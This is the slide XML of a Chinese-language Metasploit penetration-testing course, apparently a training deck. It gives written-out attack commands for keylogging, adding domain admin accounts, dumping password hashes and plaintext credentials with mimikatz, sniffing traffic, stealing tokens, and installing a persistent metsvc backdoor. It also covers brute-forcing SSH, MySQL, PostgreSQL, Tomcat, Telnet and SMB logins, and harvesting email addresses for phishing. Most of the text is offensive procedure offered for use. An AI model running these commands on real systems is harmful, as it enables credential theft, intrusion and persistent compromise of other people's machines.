              <a:t>：显示捕捉到的键盘记录信息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 err="1"/>
              <a:t>keyscan_stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：停止键盘记录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>add_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> username password -h 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    #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>在远程目标主机上添加一个用户</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>也可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>add_group_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> "Domain Admins" username -h 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    #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>将用户添加到目标主机的域管理员组中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206" y="0"/>
            <a:ext cx="8354695" cy="640080"/>
          </a:xfrm>
        </p:spPr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获取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8206" y="640081"/>
            <a:ext cx="10886529" cy="5174930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hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>获得用户的密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>值 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>  #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>加载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>模块   会单独讲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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msv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>值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kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>获取明文  抓取明文密码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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ssp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>   #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>获取明文信息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wdigest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>获取系统账户信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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>mimikatz_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -f a::   #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>必须要以错误的模块来让正确的模块显示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>mimikatz_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -f hash::   #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>获取目标 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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mimikatz_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>samdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>::hashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>meterpreter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mimikatz_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sekurlsa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searchPa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>run post/windows/gather/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>smart_hashdump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抓包嗅探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use sniffer # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>加载嗅探模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sniffer_interfaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>列出目标主机所有开放的网络接口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sniffer_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 2 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取正在实施嗅探网络接口的统计数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sniffer_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 2 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/test2.cap #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在目标主机上针对特定范围的数据包缓冲区启动嗅探</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sniffer_stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  2   #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>停止嗅探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对抓取的包进行解包：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>use auxiliary/sniffer/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>psnuffle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pcapfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 1.cap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，加载这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/xpsp1.cap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也可</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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盗取令牌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用户身份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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> &gt;use incognito    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>加载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>incoginto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>功能（用来盗窃目标主机的令牌或是假冒用户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 err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>list_tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -u    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>列出目标主机用户的可用令牌</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>list_tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -g    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>列出目标主机用户组的可用令牌</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>impersonate_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> DOMAIN_NAME\\USERNAME    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>假冒目标主机上的可用令牌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>impersonate_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> QLWEB\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Administrato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4734" y="779389"/>
            <a:ext cx="7160304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持久控制服务器 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用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的较多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4734" y="1377387"/>
            <a:ext cx="10267385" cy="439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前提条件服务器系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>可以  用的不多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meterpreter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&gt;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run metsvc 安装后门  随着开机自动运行的服务、会打开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31337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端口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监听改端口就能够连接了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msfconsole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use exploit/multi/handler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set payload windows/metsvc_bind_tcp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set LPORT 31337 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set RHOST 192.168.2.131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29" y="787935"/>
            <a:ext cx="5301864" cy="52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使用 portscan模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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74097" y="2496203"/>
            <a:ext cx="5901821" cy="24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msf&gt; search postscan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msf&gt; use auxiliary/scanner/postscan/syn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 RHOSTS 192.168.1.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setTHREADS 50111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7284" y="779388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 特定扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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39914" y="2350924"/>
            <a:ext cx="6200923" cy="27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smb_version 模块：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search </a:t>
            </a:r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</a:rPr>
              <a:t>smb_version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msf&gt; use auxiliary/scanner/smb/smb_version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showoptions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 RHOSTS 192.168.1.111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db_hosts –c address,os_flavor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7463" y="779388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找 mssql 主机：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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9858" y="1991170"/>
            <a:ext cx="10050270" cy="41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msf&gt; use auxiliary/scanner/mssql/mssql_ping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showoptions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setTHREADS 255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7284" y="787934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SSH 服务器扫描：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80094" y="2359471"/>
            <a:ext cx="6423114" cy="2340717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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msf&gt; use auxiliary/scanner/ssh/ssh_version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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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8917" y="787934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Telnet服务器扫描：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09177" y="2342378"/>
            <a:ext cx="7499884" cy="21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msf&gt; use auxiliary/scanner/telnet/telnet_version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467" y="762296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FTP 主机扫描：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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19499" y="2358638"/>
            <a:ext cx="8614576" cy="311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msf&gt; use auxiliary/scanner/ftp/ftp_version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how options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setTHREADS 255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7283" y="770842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描 FTP 匿名登录：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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80094" y="2462020"/>
            <a:ext cx="5953095" cy="24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endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/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useauxiliary/scanner/ftp/anonymos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zh-CN" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1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3590925" cy="6899910"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="5561351" cy="6899639"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-1"/>
              <a:ext cx="5561351" cy="6858002"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a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20000" contrast="-400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r="-119980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-1"/>
              <a:ext cx="5561351" cy="6899639"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="157E9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71855" y="887730"/>
            <a:ext cx="166052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evenim MT" panose="02010502060101010101" pitchFamily="2" charset="-79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evenim MT" panose="02010502060101010101" pitchFamily="2" charset="-79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07150" y="1744980"/>
            <a:ext cx="4501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MSF </a:t>
            </a:r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信息收集模块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36590" y="1847215"/>
            <a:ext cx="318770" cy="34036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1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0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077585" y="2204720"/>
            <a:ext cx="422338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419850" y="2481580"/>
            <a:ext cx="3398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MSF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密码破解模块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49290" y="2583815"/>
            <a:ext cx="318770" cy="34036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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0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6090285" y="2941320"/>
            <a:ext cx="422338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29533" y="3214949"/>
            <a:ext cx="29230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</a:rPr>
              <a:t>MSF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漏洞利用模块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8815" y="3317240"/>
            <a:ext cx="318770" cy="34036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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0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6099810" y="3674745"/>
            <a:ext cx="422338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442075" y="3874770"/>
            <a:ext cx="3691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MSF PAYLOAD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木马生成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71515" y="3977005"/>
            <a:ext cx="318770" cy="34036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4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1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6112510" y="4334510"/>
            <a:ext cx="422338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53505" y="4464050"/>
            <a:ext cx="3691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MSF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后渗透模块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82945" y="4566285"/>
            <a:ext cx="318770" cy="34036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5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1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123940" y="4923790"/>
            <a:ext cx="422338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30" y="881937"/>
            <a:ext cx="7549408" cy="5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扫描局域网内有哪些主机存活</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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14277" y="2350925"/>
            <a:ext cx="6876041" cy="20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扫描的是一个网段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useauxiliary/scanner/discovery/arp_sweep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RHOSTS 192.168.1.0/24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8917" y="933212"/>
            <a:ext cx="9848583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扫描网站目录 用的不多  主要是针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>环境的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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57006" y="2573116"/>
            <a:ext cx="5483076" cy="16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auxiliary/scanner/http/dir_scanner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RHOSTS 192.168.1.1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setTHREADS 50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29" y="916121"/>
            <a:ext cx="9631971" cy="6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搜索网站中的E-mail地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目的：钓鱼（管理员）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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36590" y="1397000"/>
            <a:ext cx="9892481" cy="377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找到邮箱可以使用社工库 进行撞库 找不到也可以发送钓鱼邮件 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很有用 后面会讲 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word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excl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、宏钓鱼 这里需要使用谷歌雅虎 要开启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nat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vpn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search_email_collector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use auxiliary/gather/search_email_collector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set DOMAIN cracer.com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run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1467" y="890484"/>
            <a:ext cx="10367942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嗅探抓包 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内网嗅探但是前提是数据没有进行加密</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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53682" y="2350092"/>
            <a:ext cx="8980918" cy="347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msf&gt; use auxiliary/sniffer/psnuffle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un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可以查询到内网一大堆信息数据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[*] Successful FTP Login: 192.168.149.133:46946-192.168.31.243:21 &gt;&gt; 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msfadmin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 / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>msfadmin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58950" y="2031365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7810" y="2840355"/>
            <a:ext cx="562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ozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PART </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t> 密码破解模块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0192" y="907575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ssh服务口令猜测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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97184" y="2171462"/>
            <a:ext cx="9507315" cy="46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use auxiliary/scanner/ssh/ssh_login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RHOSTS 192.168.80.134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USERNAME root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PASS_FILE /root/pass.txt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THREADS 50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un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</a:rPr>
              <a:t>ssh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 192.168.31.243 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输入账号密码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6188" y="881938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mysql口令攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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10952" y="2127902"/>
            <a:ext cx="8905133" cy="4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800" dirty="0" err="1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数据库无法直接爆破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root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账户，除非管理员脑残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root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账户只能是本地连接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search mysql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use auxiliary/scanner/mysql/mysql_login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show options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RHOSTS 192.168.80.130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user_file /root/user.txt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pass_file /root/pass.txt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29" y="907575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postgresql攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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20273" y="2154371"/>
            <a:ext cx="5457439" cy="263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search  postgresql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use auxiliary/scanner/postgres/postgres_login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show options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RHOSTS 192.168.80.130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user_file /root/user.txt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pass_fiel /root/pass.txt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1646" y="864846"/>
            <a:ext cx="6277794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tomcat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>管理接口 密码爆破</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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94636" y="2068913"/>
            <a:ext cx="6918770" cy="30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工具包里面的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E:\TOOLS\TOOLS\04--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密码破解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\Apache Tomcat.exe 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比较强大 推荐使用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search tomcat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use auxiliary/scanner/http/tomcat_mgr_login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RHOSTS 192.168.1.1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PASS_FILE /root/pass.txt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set USER_FILE /root/user.txt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75" y="899030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telnet 攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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86090" y="2188555"/>
            <a:ext cx="7397335" cy="21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use auxiliary/scanner/telnet/telnet_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login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set 192.168.1.1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zh-CN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58950" y="2031365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7810" y="2834640"/>
            <a:ext cx="562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ozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PART 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>信息收集模块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0191" y="873392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 dirty="0"/>
              <a:t>samba攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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77544" y="2265466"/>
            <a:ext cx="8572856" cy="35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 hydra -L /root/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桌面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/dictionary/user.txt -P /root/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桌面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/dictionary/pass.txt smb://192.168.31.23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use auxiliary/scanner/smb/smb_login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RHOSTS 192.168.1.1 /192.168.1.0/24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set THREADS 200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58950" y="2031365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7810" y="2840355"/>
            <a:ext cx="562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ozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PART </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> </a:t>
            </a:r>
